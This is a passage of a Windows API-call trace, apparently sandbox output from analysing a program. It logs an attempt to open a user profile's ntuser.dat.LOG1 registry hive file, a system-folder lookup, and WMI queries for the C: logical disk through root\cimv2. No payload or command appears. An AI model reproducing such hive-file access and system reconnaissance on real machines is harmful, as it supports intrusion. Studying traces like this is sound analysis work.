lpFileInformation=0x3777a24*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000)) returned 1 [0156.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0156.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpFilePart=0x0) returned 0x2d [0156.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0156.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0156.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfe0) returned 1 [0156.278] CoTaskMemAlloc (cb=0x20c) returned 0x7bf7a8 [0156.278] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7bf7a8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0156.279] CoTaskMemFree (pv=0x7bf7a8) [0156.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.279] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0156.279] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0156.279] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0156.279] IUnknown:Release (This=0x72015c) returned 0x1 [0156.280] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x6737078) returned 0x0 [0156.280] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0156.280] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737078, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x6738a10) returned 0x0 [0156.280] WbemDefPath:IUnknown:Release (This=0x6737078) returned 0x0 [0156.280] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x6738a10) returned 0x0 [0156.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0156.281] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0156.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0156.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0156.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x77c098) returned 0x0 [0156.281] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c098, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.281] WbemDefPath:IUnknown:Release (This=0x77c098) returned 0x3 [0156.281] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0156.281] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0156.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0156.281] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0156.281] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0156.281] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0156.281] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0156.281] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x6738a10) returned 0x0 [0156.282] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0156.282] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0156.282] WbemDefPath:IWbemPath:SetText (This=0x6738a10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0156.282] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.282] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0156.282] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0156.282] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0156.282] IUnknown:Release (This=0x72015c) returned 0x1 [0156.538] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x67370a8) returned 0x0 [0156.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0156.538] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x6738a80) returned 0x0 [0156.538] WbemDefPath:IUnknown:Release (This=0x67370a8) returned 0x0 [0156.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x6738a80) returned 0x0 [0156.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0156.538] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0156.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0156.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0156.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x77c0b8) returned 0x0 [0156.539] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c0b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.539] WbemDefPath:IUnknown:Release (This=0x77c0b8) returned 0x3 [0156.539] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0156.539] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0156.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0156.539] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0156.539] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0156.539] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0156.539] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0156.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x6738a80) returned 0x0 [0156.539] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0156.539] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0156.539] WbemDefPath:IWbemPath:SetText (This=0x6738a80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0156.539] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef140 | out: puCount=0x71ef140*=0x2) returned 0x0 [0156.539] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0156.539] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.539] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0156.540] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0156.540] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0156.540] IUnknown:Release (This=0x72015c) returned 0x1 [0156.540] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x673ef18) returned 0x0 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x673ef18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0156.541] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ef18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x6737028) returned 0x0 [0156.541] WbemLocator:IUnknown:Release (This=0x673ef18) returned 0x0 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x6737028) returned 0x0 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0156.541] WbemLocator:IUnknown:AddRef (This=0x6737028) returned 0x3 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0156.541] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0156.541] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0156.541] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0156.541] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x2 [0156.541] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x1 [0156.542] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0156.542] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0156.542] WbemLocator:IUnknown:QueryInterface (in: This=0x6737028, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x6737028) returned 0x0 [0156.542] WbemLocator:IUnknown:AddRef (This=0x6737028) returned 0x3 [0156.542] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x2 [0156.542] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0156.542] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0156.542] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.542] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x6737088) returned 0x0 [0156.542] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737088, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x672cc94) returned 0x0 [0158.967] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x780be4) returned 0x0 [0158.967] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x672cc94, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0158.967] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 [0158.967] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x780c04) returned 0x0 [0158.967] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x780be4) returned 0x0 [0158.967] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x672cc94, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.968] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0158.968] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0158.968] CoTaskMemFree (pv=0x77e118) [0158.968] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x0 [0158.968] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x780c04) returned 0x0 [0158.968] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0158.968] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0161.641] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0161.641] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0161.784] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, 